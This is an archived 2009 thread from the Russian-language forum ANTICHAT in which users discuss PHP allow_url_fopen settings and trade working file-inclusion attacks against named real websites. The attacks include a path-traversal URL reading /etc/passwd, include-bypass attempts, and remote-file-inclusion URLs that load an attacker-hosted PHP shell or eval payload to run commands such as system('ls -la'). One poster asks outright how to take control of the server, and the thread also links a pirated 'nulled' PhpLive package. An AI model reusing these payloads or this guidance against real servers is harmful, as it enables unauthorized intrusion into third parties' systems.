ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.06.2009, 00:29
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от Велемир
allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вро е все.Если стоит эта директива в ON,то можно использовать.
и что ты с этим сделаешь? прочитаешь код своего шелленга удалённого? 
разве что еси в саенте eval(file($_GET[blablabla])); ну или систем(file($_GET[blablabla]); .......
|
|
|
15.06.2009, 00:55
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Мде...как-то не подумал.Но какие-то преимущества давались,блин...
|
|
|
|
15.06.2009, 00:58
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Warning: getimagesize(/usr/virtualweb/netdirekt.de/html/c/cms/images/index_-over.jpg): failed to open stream: No such file or directory in /usr/virtualweb/netdirekt.de/html/c/cms/front_content.php(884) : eval()'d code on line 520
Здесь,я так понял,ничего не сделаешь)
http://www.netdirect.de/c/cms/front_content.php?idart=132&idcat=../../../../../../../../../../etc/passwd%00
PHP код:
Warning: auth_loginform(http://neu.netdirekt.de/c/cms/front_crcloginform.inc.php): failed to open stream: no suitable wrapper could be found in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654
PHP код:
Warning: auth_loginform(): URL file-access is disabled in the server configuration in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654
Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?
Последний раз редактировалось Велемир; 15.06.2009 в 01:01..
|
|
|
|
15.06.2009, 01:06
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
очень понятно расписано, особенно для обожателей с99шелла  :
http://www.google.com/search?hl=ru&q=getimagesize&btnG=%D0%9F%D0%BE%D0%B 8%D1%81%D0%BA&lr=
|
|
|
|
15.06.2009, 01:12
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?
до каких то там версий пшп (5.0.* чёто такое) allow_url_fopen растространялось и на file() и на include(), потом ввели allow_url_include
|
|
|
|
15.06.2009, 01:18
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
allow_url_include "0" PHP_INI_ALL PHP_INI_SYSTEM in PHP 5. Available since PHP 5.2.0.
Последний раз редактировалось Spyder; 15.06.2009 в 01:20..
|
|
|
|
15.06.2009, 01:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Велемир
В статье какой-то было.
Вот эта статья https://forum.antichat.ru/thread91807.html
Сообщение от Велемир
Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?
http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0
l
Сделай так
http://www.alertsite.com/phplive/image.php?l=image.php/./.[...]/././.
Будет
Warning: is_dir(): Stat failed for ./web/image.php......................................... .................................................. .................................................. .................................................. .................................................. ............................. (errno=36 - File name too long)
Это phplive, там фильтрация+file_exists+is_dir. Вот этот двиг нулленный - http://rapidshare.com/files/86879595/Phplive.3.2.2.NULLED-FiXED-LOGOUT.rar
смотри сурс image.php, там правда закоментили кусок кода (видимо химичили пока делали нулл), но сайте все работает
|
|
|
|
15.06.2009, 02:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Тык инклуд работает ?)
|
|
|
|
15.06.2009, 10:07
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
Провел на форуме:
23709
Репутация:
6
|
|
Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.
<?php
print("<h3>SHELL</h3>");
print(system("ls -al"));
?>
подставил так
http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
отобразилось токо слов SHELL.
Подскажите, как взять сервак под контроль?
|
|
|
|
15.06.2009, 10:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Обычный RFI, заливаешь УЖЕ полноценный шелл хоть на народ.ру и просто указываешь ссылку на него - только что проверил на с99-шелле
Но если ты так любишь извращения, то залей на народ.ру (свой сайт) такой eval.txt:
и потом подключи вот так:
Код:
http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=phpinfo();
http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=system('ls%20-la');
но в последнем случае пишет:
Код:
Warning: system() has been disabled for security reasons
так что не парься и подключай нормальный шелл сразу 
Последний раз редактировалось Pashkela; 15.06.2009 в 10:25..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
